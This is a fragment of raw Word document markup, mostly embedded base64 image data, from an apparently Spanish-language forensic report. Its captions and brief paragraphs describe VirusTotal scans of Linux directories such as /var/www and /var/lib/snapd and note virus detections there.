oFN4wdIMy+EzT0UndjS+tQrF&#10;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OkTBPIBBAAAtQsAAA4AAAAAAAAA&#10;AAAAAAAAOgIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAFvrZsw6xQAAOsUAABQAAAAA&#10;AAAAAAAAAAAAZwYAAGRycy9tZWRpYS9pbWFnZTEucG5nUEsBAi0ACgAAAAAAAAAhAFxONyeouQAA&#10;qLkAABQAAAAAAAAAAAAAAAAA08sAAGRycy9tZWRpYS9pbWFnZTIucG5nUEsBAi0AFAAGAAgAAAAh&#10;AASEbfreAAAABwEAAA8AAAAAAAAAAAAAAAAArYUBAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAI&#10;AAAAIQAubPAAxQAAAKUBAAAZAAAAAAAAAAAAAAAAALiGAQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5y&#10;ZWxzUEsFBgAAAAAHAAcAvgEAALSHAQAAAA==&#10;">
                <v:group id="_x0000_s1147" style="position:absolute;width:50292;height:12331" coordsize="54036,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YjdyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9fa8Iw&#10;EH8f7DuEE/Y203TTzWoUkW34IIPpYPh2NGdbbC6lydr67Y0w2OP9/t9iNdhadNT6yrEGNU5AEOfO&#10;VFxo+D68P76C8AHZYO2YNFzIw2p5f7fAzLiev6jbh0LEEPYZaihDaDIpfV6SRT92DXHkTq61GOLZ&#10;FtK02MdwW8s0SabSYsWxocSGNiXl5/2v1fDRY79+Um/d7nzaXI6HyefPTpHWD6NhPQcRaAj/4j/3&#10;1sT5M6XS9FlNX+D2UwRALq8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAiVGI3ckAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;">
                  <v:shape id="Imagen 51" o:spid="_x0000_s1148" type="#_x0000_t75" style="position:absolute;left:28046;width:25990;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Ew7xQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9fS8Mw&#10;EH8X/A7hBN9c2lnL6JYNEQd9krnp+9Fck7LmUpq4xW9vBMHH+/2/zS65UVxoDoNnBeWiAEHceT2w&#10;UfBx2j+sQISIrHH0TAq+KcBue3uzwUb7K7/T5RiNyCEcGlRgY5waKUNnyWFY+Ik4c72fHcZ8zkbq&#10;Ga853I1yWRS1dDhwbrA40Yul7nz8cgreettiv0/ja91+mipUhzIdjFL3d+l5DSJSiv/iP3er8/zH&#10;crWsirJ+gt+fMgBy+wMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAhZEw7xQAAAOMAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                    <v:imagedata r:id="rId187" o:title=""/>
                  </v:shape>
                  <v:shape id="Imagen 50" o:spid="_x0000_s1149" type="#_x0000_t75" style="position:absolute;width:27927;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t/iygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NSgMx&#10;FIX3gu8QruDOJpVx1GnTImUUwbqw7cLubie3M8HJzZDEdnx7sxBcHs4f33w5ul6cKETrWcN0okAQ&#10;N95YbjXsts83DyBiQjbYeyYNPxRhubi8mGNl/Jk/6LRJrcgjHCvU0KU0VFLGpiOHceIH4uwdfXCY&#10;sgytNAHPedz18lapUjq0nB86HGjVUfO1+XYa1qvHvSpqU4dj+1a/fB6sV+9W6+ur8WkGItGY/sN/&#10;7VejoSiK+1LdlRkiI2UckItfAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPaq3+LKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                    <v:imagedata r:id="rId188" o:title=""/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1150" type="#_x0000_t202" style="position:absolute;top:12560;width:5029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SGvyAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/PS8Mw&#10;FL4L/g/hCV7EpdWuzLpsjKGgXobdLt4ezVtTbV5Kkm71vzeC4PHj+71cT7YXJ/Khc6wgn2UgiBun&#10;O24VHPbPtwsQISJr7B2Tgm8KsF5dXiyx0u7M73SqYytSCIcKFZgYh0rK0BiyGGZuIE7c0XmLMUHf&#10;Su3xnMJtL++yrJQWO04NBgfaGmq+6tEq2BUfO3MzHp/eNsW9fz2M2/KzrZW6vpo2jyAiTfFf/Od+&#10;0Wn+vMyKfP6Qw++lhEGufgAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBcISGvyAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4B21BFFF" w14:textId="6694524A" w:rsidR="007306FD" w:rsidRPr="00735D95" w:rsidRDefault="007306FD" w:rsidP="007306FD">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>38</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="97" w:name="_Toc155782605"/>
                        <w:r w:rsidRPr="004501BF">
                          <w:t>Análisis de /var/www y /var/lib/snapd en VirusTotal.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="97"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se detecta virus en </w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/lib/snapd/</w:t>
      </w:r>
      <w:r w:rsidR="000C4414" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5961C47F" w14:textId="4D6ED92A" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se procede a realizar análisis dentro de </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/lib/snapd/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF3D77" w14:textId="13C46F41" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se detecta virus en </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/lib/snapd/snaps/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B233C0" w14:textId="29D6239F" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se procede a realizar análisis dentro de </w:t>
      </w:r>
      <w:r w:rsidRPr="001C6280">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/lib/snapd/snaps/</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDAD2A3" w14:textId="28C6741D" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="00BD1378" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251814912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60613BB3" wp14:editId="4CF64D56">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>221</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5394960" cy="1687343"/>
                <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="589497940" name="Grupo 35"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5394960" cy="1687343"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5394960" cy="1687343"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvPr id="1123569932" name="Grupo 19"/>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5394960" cy="1379855"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="5395209" cy="1379855"/>
                          </a:xfrm>
                        </wpg:grpSpPr>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="322467573" name="Imagen 54" descr="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente"/>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423160" cy="1370965"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                        <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                          <pic:nvPicPr>
                            <pic:cNvPr id="602140051" name="Imagen 55" descr="Interfaz de usuario gráfica, Sitio web&#10;&#10;Descripción generada automáticamente"/>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2886324" y="0"/>
                              <a:ext cx="2508885" cy="1379855"/>
                            </a:xfrm>
                            <a:prstGeom prst="rect">
                              <a:avLst/>
                            </a:prstGeom>
                          </pic:spPr>
                        </pic:pic>
                      </wpg:grpSp>
                      <wps:wsp>
                        <wps:cNvPr id="222449099" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="116958" y="1403498"/>
                            <a:ext cx="5165725" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="78EB8A75" w14:textId="6F28CA77" w:rsidR="00FB12A0" w:rsidRPr="008B22E9" w:rsidRDefault="00FB12A0" w:rsidP="00FB12A0">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>39</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="98" w:name="_Toc155782606"/>
                              <w:r w:rsidRPr="008F55FE">
                                <w:t>Análisis de /var/lib/snapd/snaps y /var/www/html/.htcaccess en VirusTotal.</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613BB3" id="Grupo 35" o:spid="_x0000_s1151" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:424.8pt;height:132.85pt;z-index:251814912;mso-position-horizontal:left;mso-position-horizontal-relative:margin" coordsize="53949,16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